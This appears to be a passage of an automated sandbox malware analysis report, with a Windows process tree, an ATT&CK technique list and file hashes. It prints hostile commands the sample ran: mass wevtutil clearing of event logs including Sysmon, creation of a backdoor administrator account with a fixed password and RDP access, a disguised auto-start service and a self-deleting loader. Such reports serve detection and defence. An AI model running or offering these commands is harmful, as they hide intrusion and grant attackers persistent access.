- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Perf"
    3⤵
    PID:8604
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SendTo/Diagnostic"
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:6528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sensors/Debug"
    3⤵
    PID:10892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sensors/Performance"
    3⤵
    PID:11084
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
    3⤵
    PID:7276
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension/Analytic"
    3⤵
    PID:7620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:8812
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:9580
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:10084
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Servicing/Debug"
    3⤵
    - Clears Windows event logs
    PID:11244
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Debug"
    3⤵
    PID:6752
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Operational"
    3⤵
    PID:8016
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Analytic"
    3⤵
    PID:6720
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Debug"
    3⤵
    PID:8568
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Operational"
    3⤵
    PID:8780
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync/Analytic"
    3⤵
    PID:8436
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync/Debug"
    3⤵
    PID:9032
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync/Operational"
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SettingSync/VerboseDebug"
    3⤵
    PID:8716
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:10280
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:10704
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupPlatform/Analytic"
    3⤵
    PID:11108
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    - Clears Windows event logs
    PID:7668
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:9876
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
    3⤵
    PID:10840
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:10040
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8916
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:9804
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
    3⤵
    PID:8496
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:9444
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:8632
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:10664
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
    3⤵
    PID:9692
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/ActionCenter"
    3⤵
    PID:7988
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/AppDefaults"
    3⤵
    PID:7064
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:8176
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/LogonTasksChannel"
    3⤵
    PID:6820
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Core/Operational"
    3⤵
    PID:9832
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:10180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
    3⤵
    PID:8044
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-OpenWith/Diagnostic"
    3⤵
    PID:11088
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:10900
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:7932
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
    3⤵
    PID:7848
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:10644
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SleepStudy/Diagnostic"
    3⤵
    PID:8484
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmartCard-Audit/Authentication"
    3⤵
    PID:11600
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
    3⤵
    PID:7524
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
    3⤵
    PID:8392
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
    3⤵
    PID:11820
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmartScreen/Debug"
    3⤵
    PID:6588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmbClient/Audit"
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmbClient/Connectivity"
    3⤵
    PID:6540
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmbClient/Diagnostic"
    3⤵
    PID:11056
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SmbClient/Security"
    3⤵
    PID:12000
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    - Clears Windows event logs
    - System Location Discovery: System Language Discovery
    PID:7052
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:8152
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:7648
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Spellchecking-Host/Analytic"
    3⤵
    PID:10184
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SruMon/Diagnostic"
    3⤵
    PID:7224
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SrumTelemetry"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8032
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StateRepository/Debug"
    3⤵
    PID:6712
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StateRepository/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4832
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StateRepository/Operational"
    3⤵
    PID:3236
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StateRepository/Restricted"
    3⤵
    PID:6792
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:9716
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:10372
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Admin"
    3⤵
    - Clears Windows event logs
    PID:6744
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Analytic"
    3⤵
    PID:9516
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Debug"
    3⤵
    PID:7096
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Diagnose"
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ATAPort/Operational"
    3⤵
    PID:6652
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Admin"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Analytic"
    3⤵
    PID:12028
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Debug"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9984
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Diagnose"
    3⤵
    PID:10416
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-ClassPnP/Operational"
    3⤵
    PID:6584
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Admin"
    3⤵
    PID:11072
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Analytic"
    3⤵
    PID:8712
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Debug"
    3⤵
    - Clears Windows event logs
    PID:6512
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Diagnose"
    3⤵
    PID:7228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Disk/Operational"
    3⤵
    PID:11580
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Admin"
    3⤵
    PID:9528
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Analytic"
    3⤵
    - Clears Windows event logs
    PID:11388
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Debug"
    3⤵
    PID:11356
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Diagnose"
    3⤵
    PID:7780
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Health"
    3⤵
    PID:11368
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Storport/Operational"
    3⤵
    PID:6240
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Tiering-IoHeat/Heat"
    3⤵
    PID:7880
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storage-Tiering/Admin"
    3⤵
    PID:8872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageManagement/Debug"
    3⤵
    PID:7080
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageManagement/Operational"
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSettings/Diagnostic"
    3⤵
    PID:11500
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSpaces-Driver/Diagnostic"
    3⤵
    PID:8676
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSpaces-Driver/Operational"
    3⤵
    PID:6616
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSpaces-Driver/Performance"
    3⤵
    PID:11228
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
    3⤵
    PID:11576
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic"
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-StorageSpaces-SpaceManager/Operational"
    3⤵
    - Clears Windows event logs
    PID:11824
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Store/Operational"
    3⤵
    PID:10196
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Storsvc/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7564
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:10532
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9236
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:7844
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/PfApLog"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7456
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sysmon/Operational"
    3⤵
    - Clears Windows event logs
    PID:11620
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:11416
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-System-Profile-HardwareId/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9100
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SystemSettingsHandlers/Debug"
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SystemSettingsThreshold/Debug"
    3⤵
    - Clears Windows event logs
    PID:12248
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SystemSettingsThreshold/Diagnostic"
    3⤵
    PID:9720
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-SystemSettingsThreshold/Operational"
    3⤵
    PID:8344
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4516
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TCPIP/Operational"
    3⤵
    PID:11472
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:3536
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:12196
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:8292
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TTS/Diagnostic"
    3⤵
    PID:11880
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TWinAPI/Diagnostic"
    3⤵
    PID:11268
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TWinUI/Diagnostic"
    3⤵
    PID:11192
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TWinUI/Operational"
    3⤵
    PID:11564
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TZSync/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:11664
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TZSync/Operational"
    3⤵
    PID:10100
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:8972
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:12096
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    PID:11428
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Maintenance"
    3⤵
    PID:11512
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    - Clears Windows event logs
    PID:11936
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:9872
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:12048
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:9728
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:11140
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    PID:6980
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:6536
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:9736
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:8252
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:11940
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    PID:11560
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:10212
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:7768
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:2412
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-Printers/Admin"
    3⤵
    PID:12188
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Microsoft-Windows-TerminalServices-Printers/Analytic"
    3⤵
    PID:11300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Test\systembackup.bat" "
  2⤵
  PID:10868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
    3⤵
    PID:4408
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
      4⤵
      PID:10552
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:9784
- - C:\Windows\SysWOW64\net.exe
    net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
    3⤵
    PID:6644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:6836
- - C:\Windows\SysWOW64\net.exe
    net localgroup Administrators systembackup /add
    3⤵
    PID:9388
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Administrators systembackup /add
      4⤵
      PID:12200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
    3⤵
    PID:8604
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
      4⤵
      PID:8456
  - - C:\Windows\SysWOW64\find.exe
      Find "="
      4⤵
      PID:8324
- - C:\Windows\SysWOW64\net.exe
    net localgroup "Remote Desktop Users" systembackup /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:8896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      PID:7796
- - C:\Windows\SysWOW64\net.exe
    net accounts /forcelogoff:no /maxpwage:unlimited
    3⤵
    PID:8232
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:3652
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    3⤵
    PID:8448
- C:\ProgramData\Test\loader.exe
  "C:\ProgramData\Test\loader.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SendNotifyMessage
  PID:8080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cd C:\ProgramData\Microsoft\Network\Downloader && amc install BackupMicrosoftServer C:\ProgramData\Microsoft\Network\Downloader\pcupdater.exe
    3⤵
    PID:6872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cd C:\ProgramData\Microsoft\Network\Downloader && amc start BackupMicrosoftServer
    3⤵
    PID:8848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cd C:\ProgramData\Microsoft\Network\Downloader && amc set BackupMicrosoftServer start SERVICE_AUTO_START && amc start BackupMicrosoftServer
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping -n 5 localhost < nul & del /F /Q "C:\ProgramData\Test\loader.exe"
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:7428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:6796
- C:\ProgramData\Test\MouseLock.exe
  "C:\ProgramData\Test\MouseLock.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  PID:6484

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:10828

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\2b0667803a3a4769a9c0be6dbbcacb19 /t 10768 /p 7448
1⤵
PID:11648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Peripheral Device Discovery

T1120

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Time Discovery

T1124

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\IObit\IObit Unlocker\IObitUnlocker.exe

Filesize
2.3MB

MD5
9303575597168ef11790500b29279f56

SHA1
bfab0ea30c5959fda893b9ddc6a348a4f47f8677

SHA256
0a507a553010c19369f17b649c5ffe6060216480059062ff75241944cf729bd7

SHA512
8e9f7a98c0a0c90643403d4abccd8736d12ba6bef83679ccfd626e52e86ed7db6fe558c6ec48a88cf32967c00d66131f550ac64cc98cd73fd477f165694e68b0

Download Submit
C:\Program Files (x86)\IObit\IObit Unlocker\is-PLNNL.tmp

Filesize
71KB

MD5
e1a4327af3cd8ca866996f472f0ff93a

SHA1
cfea8426ef8fab4136055401152821a19f908d45

SHA256
5f0bc7d75f32981e0e704c2217ed423c9a355f19515a1603103cc55cf9d3b901

SHA512
